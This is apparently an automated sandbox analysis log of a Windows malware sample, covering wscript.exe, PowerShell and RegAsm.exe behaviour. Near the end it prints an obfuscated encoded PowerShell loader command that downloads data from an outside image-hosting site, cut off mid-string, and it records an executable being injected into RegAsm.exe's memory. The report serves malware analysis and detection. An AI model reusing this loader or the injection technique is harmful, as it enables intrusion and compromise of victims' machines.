            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: FF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4C00000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1654Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1669Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4435Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5313Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3015Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 992Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3317Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6492Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4160Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 4435 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3928Thread sleep count: 5313 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -14757395258967632s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 3015 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep count: 992 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2820Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3664Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4568Thread sleep count: 3317 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4568Thread sleep count: 6492 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp&
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235638255.000002CC1EC7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000007.00000002.3512863153.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
            Source: Yara matchFile source: amsi64_6412.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD3008Jump to behavior
